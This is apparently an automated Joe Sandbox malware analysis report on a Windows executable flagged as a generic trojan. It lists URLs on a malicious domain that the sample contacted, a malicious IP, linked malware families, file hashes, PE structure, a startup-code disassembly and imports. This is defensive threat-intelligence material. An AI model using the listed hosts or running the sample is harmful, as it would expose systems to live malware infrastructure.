                                        https://easthoolbook.com/sign.mpeg?dare=trueHjSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2901567104.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.000000000051B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://easthoolbook.com/sign.mpeg?dare=truephicSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://easthoolbook.com/sign.mpeg?dare=truetSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.00000000004E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://easthoolbook.com/sign.mpeg?dare=true:dSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151387101.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181259233.000000000051B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://easthoolbook.com/sign.mpeg?dare=trueNxSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.00000000004E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://easthoolbook.com/rSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245388886.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.000000000051B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://easthoolbook.com/sign.mpeg?dare=true.0hSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3291723868.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3261508325.000000000313D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://easthoolbook.com/8jSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.000000000051B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://easthoolbook.com/oSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3291723868.000000000313D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://easthoolbook.com/sign.mpeg?dare=truedllSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.0000000000459000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://easthoolbook.com/vSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://easthoolbook.com/SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151387101.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3218783983.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151112670.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3188931002.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3261508325.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245218172.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3099234815.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212324717.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2121493380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.00000000004A2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2092109726.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181153623.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3051105235.000000000313D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://easthoolbook.com/sign.mpeg?dare=trueTjSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.000000000051B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://easthoolbook.com/sign.mpeg?dare=truesrPSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2781427971.000000000313D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://easthoolbook.com/sign.mpeg?dare=truezYSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245388886.00000000004E8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.00000000004E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://easthoolbook.com/sign.mpeg?dare=trueLSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.000000000051B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://easthoolbook.com/sign.mpeg?dare=trueLjSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          89.150.57.46
                                                                          		easthoolbook.comItaly
                                                                          		39356AVANTI-UK-ASGBtrue

                                                                          General Information

                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                          Analysis ID:1428763
                                                                          Start date and time:2024-04-19 15:30:12 +02:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 6m 5s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:5
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Detection:MAL
                                                                          Classification:mal92.troj.evad.winEXE@1/0@1/1
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 73%
                                                                          • Number of executed functions: 9
                                                                          • Number of non-executed functions: 258
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • VT rate limit hit for: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          No simulations

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          No context

                                                                          Domains

                                                                          No context

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          AVANTI-UK-ASGB4cpLrmQNPM.elfGet hashmaliciousMiraiBrowse
                                                                          • 41.198.120.194
                                                                          Quotation_Doc.wsfGet hashmaliciousPython StealerBrowse
                                                                          • 89.150.57.121
                                                                          BqGE57kqQq.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 41.198.120.153
                                                                          mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 41.198.120.188
                                                                          I5MXVvJym2.elfGet hashmaliciousMiraiBrowse
                                                                          • 88.210.159.170
                                                                          MnR9Zf2F4a.elfGet hashmaliciousMiraiBrowse
                                                                          • 41.198.120.178
                                                                          13TOimKEUH.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 41.198.120.176
                                                                          0byIXCn6Uf.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 41.198.119.249
                                                                          mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 41.198.120.163
                                                                          arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 41.198.120.185

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          37f463bf4616ecd445d4a1937da06e19UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                          • 89.150.57.46
                                                                          SecuriteInfo.com.Trojan.DownLoader40.42214.8350.4072.exeGet hashmaliciousUnknownBrowse
                                                                          • 89.150.57.46
                                                                          SecuriteInfo.com.Trojan.DownLoader40.42214.8350.4072.exeGet hashmaliciousUnknownBrowse
                                                                          • 89.150.57.46
                                                                          POTWIERDZENIE_TRANSAKCJI_20240418145856.exeGet hashmaliciousGuLoaderBrowse
                                                                          • 89.150.57.46
                                                                          eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                          • 89.150.57.46
                                                                          SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exeGet hashmaliciousPureLog StealerBrowse
                                                                          • 89.150.57.46
                                                                          SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exeGet hashmaliciousPureLog StealerBrowse
                                                                          • 89.150.57.46
                                                                          Shipping Dcuments_CI PKL_HL_.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 89.150.57.46
                                                                          F723838674.vbsGet hashmaliciousUnknownBrowse
                                                                          • 89.150.57.46
                                                                          Request for Proposal Quote_2414976#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                          • 89.150.57.46

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          No created / dropped files found

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Entropy (8bit):6.412960095301957
                                                                          TrID:
                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          File size:3'636'736 bytes
                                                                          MD5:c720c50306558112b389ef44cff494f1
                                                                          SHA1:476f36c3f3a3aa0141b481fb683d3c0cbd767def
                                                                          SHA256:6b655ddf0b5cda5d24b62d2f387e0f83e57b7a931f55f49ad274b002c1a68b23
                                                                          SHA512:eac2ba4774dce3667226f246940818412acadb556ac714a41d3790564200c015622cac38364657f46a47bb7a0fc5f4a9a39786acfd43a502b8d051ee61b2cf74
                                                                          SSDEEP:49152:JkIpd4zV1qhdWfcYmw+FFndWaIO18B+VhlRVmgi5HKEOaDNkNVLORJ5kjAYW:yYVYlBWRVmgZyC0k0
                                                                          TLSH:D1F57DC9D6AC40E9D1A79234C902857BDEB1BC113A76F7DF30690E4A2F631A9CD59332
                                                                          File Content Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......9.B.}.,.}.,.}.,...(.a.,.../.n.,...)...,...(.[.,.../.q.,...)...,...*.p.,...-.\.,.}.-.g.,...)...,...)...,...%.t.,.....|.,.}...|.,

                                                                          File Icon

                                                                          Icon Hash:072c1d4933138e4d

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x1401cbf38
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x140000000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                          DLL Characteristics:HIGH_ENTROPY_VA
                                                                          Time Stamp:0x65C323A8 [Wed Feb 7 06:31:04 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:6
                                                                          OS Version Minor:0
                                                                          File Version Major:6
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:6
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:3b504801f5d6b0cd4eeeea42835639ab

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          dec eax
                                                                          sub esp, 28h
                                                                          call 00007F73DC9D055Ch
                                                                          dec eax
                                                                          add esp, 28h
                                                                          jmp 00007F73DC9CFAFBh
                                                                          int3
                                                                          int3
                                                                          inc eax
                                                                          push ebx
                                                                          dec eax
                                                                          sub esp, 20h
                                                                          dec eax
                                                                          mov ebx, ecx
                                                                          xor ecx, ecx
                                                                          call dword ptr [00047593h]
                                                                          dec eax
                                                                          mov ecx, ebx
                                                                          call dword ptr [00047582h]
                                                                          call dword ptr [000478A4h]
                                                                          dec eax
                                                                          mov ecx, eax
                                                                          mov edx, C0000409h
                                                                          dec eax
                                                                          add esp, 20h
                                                                          pop ebx
                                                                          dec eax
                                                                          jmp dword ptr [00047578h]
                                                                          dec eax
                                                                          mov dword ptr [esp+08h], ecx
                                                                          dec eax
                                                                          sub esp, 38h
                                                                          mov ecx, 00000017h
                                                                          call 00007F73DCA05389h
                                                                          test eax, eax
                                                                          je 00007F73DC9CFC89h
                                                                          mov ecx, 00000002h
                                                                          int 29h
                                                                          dec eax
                                                                          lea ecx, dword ptr [0011E6ABh]
                                                                          call 00007F73DC9CFE4Fh
                                                                          dec eax
                                                                          mov eax, dword ptr [esp+38h]
                                                                          dec eax
                                                                          mov dword ptr [0011E792h], eax
                                                                          dec eax
                                                                          lea eax, dword ptr [esp+38h]
                                                                          dec eax
                                                                          add eax, 08h
                                                                          dec eax
                                                                          mov dword ptr [0011E722h], eax
                                                                          dec eax
                                                                          mov eax, dword ptr [0011E77Bh]
                                                                          dec eax
                                                                          mov dword ptr [0011E5ECh], eax
                                                                          dec eax
                                                                          mov eax, dword ptr [esp+40h]
                                                                          dec eax
                                                                          mov dword ptr [0011E6F0h], eax
                                                                          mov dword ptr [0011E5C6h], C0000409h
                                                                          mov dword ptr [0011E5C0h], 00000001h
                                                                          mov dword ptr [0011E5CAh], 00000001h
                                                                          mov eax, 00000008h

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2d10800x140.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3060000x70698.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2ed0000x185e8.pdata
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x3770000xf7b8.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x28bdb00x70.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x28bf180x28.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x28be200xf8.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x2130000x1328.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x211a3c0x211c00a7bb40416dfe6477f8e3ce3ca337326cunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x2130000xc1e580xc2000fdbdad3cc633e673fd958b18b960df54False0.27393962427512886data4.498731764060973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0x2d50000x1771c0xb800c2df8284278ede26c37d438e19173d49False0.16550611413043478data4.479725947739707IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .pdata0x2ed0000x185e80x18600704edeed305891f0bf7ceec95f99d1adFalse0.504286858974359data6.2240240078238855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x3060000x706980x708004b5d2bf5b01b522a4531a99ecfd6c5d0False0.7417035590277777data7.144230024604653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x3770000xf7b80xf80036f1ec4316f8ab104ef0c0169949ba29False0.0985383064516129data5.449482947571136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x3064680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.369136460554371
                                                                          RT_ICON0x3073100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.4187725631768953
                                                                          RT_ICON0x307bb80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.4147398843930636
                                                                          RT_ICON0x3081200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.5245850622406639
                                                                          RT_ICON0x30a6c80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.6285178236397748
                                                                          RT_ICON0x30b7700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.7668439716312057
                                                                          RT_ICON0x30bbd80x19dfPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9818813226634455
                                                                          RT_ICON0x30d5b80x1891PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9790109715376053
                                                                          RT_ICON0x30ee4c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.06688453803383414
                                                                          RT_ICON0x31f6740x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.14365847897968823
                                                                          RT_ICON0x32389c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.20653526970954356
                                                                          RT_ICON0x325e440x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 0EnglishUnited States0.2338757396449704
                                                                          RT_ICON0x3278ac0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.2797842401500938
                                                                          RT_ICON0x3289540x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.3495901639344262
                                                                          RT_ICON0x3292dc0x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 0EnglishUnited States0.3866279069767442
                                                                          RT_ICON0x3299940x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.4512411347517731
                                                                          RT_DIALOG0x329dfc0x4c0dfdata0.9726180425592018
                                                                          RT_GROUP_ICON0x375edc0x92dataEnglishUnited States0.726027397260274
                                                                          RT_VERSION0x375f700x4a4dataEnglishUnited States0.4107744107744108
                                                                          RT_MANIFEST0x3764140x282XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5529595015576324

                                                                          Imports

                                                                          DLLImport
                                                                          KERNEL32.dllEncodePointer, GetSystemDirectoryW, CompareStringW, GetLocaleInfoW, GetUserDefaultUILanguage, GlobalFlags, SetEvent, WaitForSingleObject, CreateEventW, SetThreadPriority, ResumeThread, FreeResource, GlobalFindAtomW, WriteFile, GetCurrentDirectoryW, FileTimeToLocalFileTime, GetFileAttributesW, GetFileAttributesExW, GetFileSizeEx, GetFileTime, SystemTimeToTzSpecificLocalTime, VirtualProtect, lstrcpyW, FindResourceExW, GetWindowsDirectoryW, VerSetConditionMask, VerifyVersionInfoW, GetTempFileNameW, GetTempPathW, GetTickCount, GetProfileIntW, SearchPathW, GetUserDefaultLCID, ResetEvent, WaitForSingleObjectEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, OutputDebugStringW, GetStringTypeW, LCMapStringW, GetCPInfo, RtlUnwindEx, RtlPcToFileHeader, GetStdHandle, GetFileType, WriteConsoleW, GetCommandLineA, GetCommandLineW, HeapQueryInformation, CreateThread, ExitThread, FreeLibraryAndExitThread, GetSystemInfo, VirtualAlloc, VirtualQuery, QueryPerformanceFrequency, SetStdHandle, GetACP, IsValidLocale, EnumSystemLocalesW, SetFilePointerEx, GetConsoleMode, ReadConsoleW, GetConsoleCP, GetTimeZoneInformation, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, GetLocalTime, UnlockFile, SetFilePointer, SetEndOfFile, ReadFile, LockFile, GetVolumeInformationW, GetFullPathNameW, GetFileSize, FlushFileBuffers, FindFirstFileW, FindClose, DeleteFileW, CreateFileW, GlobalAddAtomW, lstrcmpW, GlobalDeleteAtom, LoadLibraryExW, FreeLibrary, GetVersionExW, FileTimeToSystemTime, GlobalGetAtomNameW, lstrcmpA, GetCurrentProcessId, LocalReAlloc, LocalAlloc, GlobalHandle, GlobalReAlloc, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, GetProcAddress, GetModuleHandleW, QueryActCtxW, FindActCtxSectionStringW, DeactivateActCtx, ActivateActCtx, CreateActCtxW, LoadLibraryW, GetModuleHandleExW, GetModuleFileNameW, OutputDebugStringA, WideCharToMultiByte, SetLastError, CopyFileW, MulDiv, GlobalFree, GlobalUnlock, GlobalLock, GlobalSize, GlobalAlloc, lstrcmpiW, GetCurrentProcess, ExitProcess, DuplicateHandle, MoveFileExW, GetDriveTypeW, GetFileInformationByHandle, PeekNamedPipe, CloseHandle, OpenEventW, GetProcessHeap, DeleteCriticalSection, HeapDestroy, DecodePointer, HeapAlloc, RaiseException, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, HeapFree, Sleep, MultiByteToWideChar, GetLastError, FindResourceW, LoadResource, LockResource, SizeofResource, SetConsoleCtrlHandler, GetCurrentThreadId, LocalFree, FormatMessageW
                                                                          USER32.dllSetLayeredWindowAttributes, EnumDisplayMonitors, SetClassLongPtrW, SetWindowRgn, SetParent, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard, DrawStateW, DrawEdge, DrawFrameControl, IsZoomed, GetSystemMenu, BringWindowToTop, SetCursorPos, CopyIcon, FrameRect, DrawIcon, UnionRect, UpdateLayeredWindow, MonitorFromPoint, LoadAcceleratorsW, TranslateAcceleratorW, InsertMenuItemW, UnpackDDElParam, ReuseDDElParam, GetComboBoxInfo, WaitMessage, GetKeyboardLayout, IsCharLowerW, MapVirtualKeyExW, ToUnicodeEx, GetKeyboardState, CreateAcceleratorTableW, DestroyAcceleratorTable, CopyAcceleratorTableW, SetRect, LockWindowUpdate, SetMenuDefaultItem, GetDoubleClickTime, ModifyMenuW, RegisterClipboardFormatW, CharUpperBuffW, IsClipboardFormatAvailable, GetUpdateRect, DrawMenuBar, DefFrameProcW, DefMDIChildProcW, TranslateMDISysAccel, SubtractRect, CreateMenu, GetWindowRgn, DestroyCursor, EndPaint, BeginPaint, SetForegroundWindow, GetForegroundWindow, SetActiveWindow, UpdateWindow, TrackPopupMenu, SetMenu, GetMenu, GetCapture, IsIconic, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, DestroyWindow, GetIconInfo, IsMenu, CreateWindowExW, GetClassInfoExW, GetClassInfoW, RegisterClassW, CallWindowProcW, DefWindowProcW, GetMessageTime, GetMessagePos, RegisterWindowMessageW, GetScrollPos, SetScrollPos, CallNextHookEx, SetWindowsHookExW, GetCursorPos, ValidateRect, GetKeyState, GetActiveWindow, IsWindowVisible, PeekMessageW, RealChildWindowFromPoint, GetKeyNameTextW, GetDesktopWindow, PtInRect, ClientToScreen, GetWindowRect, CharUpperW, DestroyIcon, PostMessageW, IsDialogMessageW, GetWindow, SetWindowLongW, SetWindowTextW, GetFocus, SetFocus, GetDlgCtrlID, CheckDlgButton, GetDlgItem, SetWindowPos, MoveWindow, ShowWindow, IsWindow, GetWindowTextLengthW, GetWindowTextW, GetLastActivePopup, GetWindowThreadProcessId, GetParent, GetWindowLongW, MessageBoxW, IsWindowEnabled, EnableWindow, SendMessageW, LoadCursorW, GetSysColorBrush, GetSysColor, ReleaseDC, GetDC, GetSystemMetrics, UnhookWindowsHookEx, RemoveMenu, AppendMenuW, InsertMenuW, GetMenuItemCount, GetMenuItemID, GetSubMenu, GetMenuState, GetMenuStringW, DrawIconEx, PostThreadMessageW, GetMessageW, TranslateMessage, DispatchMessageW, MapVirtualKeyW, IsRectEmpty, DrawFocusRect, WindowFromPoint, ReleaseCapture, SetCapture, GetNextDlgGroupItem, LoadImageW, TrackMouseEvent, IntersectRect, MapDialogRect, GetAsyncKeyState, GetNextDlgTabItem, EndDialog, CreateDialogIndirectParamW, OffsetRect, SetRectEmpty, SendDlgItemMessageA, InflateRect, GetMenuItemInfoW, DestroyMenu, FillRect, GetWindowDC, TabbedTextOutW, GrayStringW, DrawTextExW, RedrawWindow, InvalidateRect, KillTimer, SetTimer, DeleteMenu, SetCursor, ShowOwnedPopups, SystemParametersInfoW, CopyImage, LoadBitmapW, SetMenuItemInfoW, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, EnableMenuItem, CheckMenuItem, GetMonitorInfoW, MonitorFromWindow, WinHelpW, GetScrollInfo, GetMenuDefaultItem, LoadMenuW, CreatePopupMenu, NotifyWinEvent, InvertRect, HideCaret, EnableScrollBar, GetClassNameW, MessageBeep, SetScrollInfo, LoadIconW, GetTopWindow, GetClassLongPtrW, 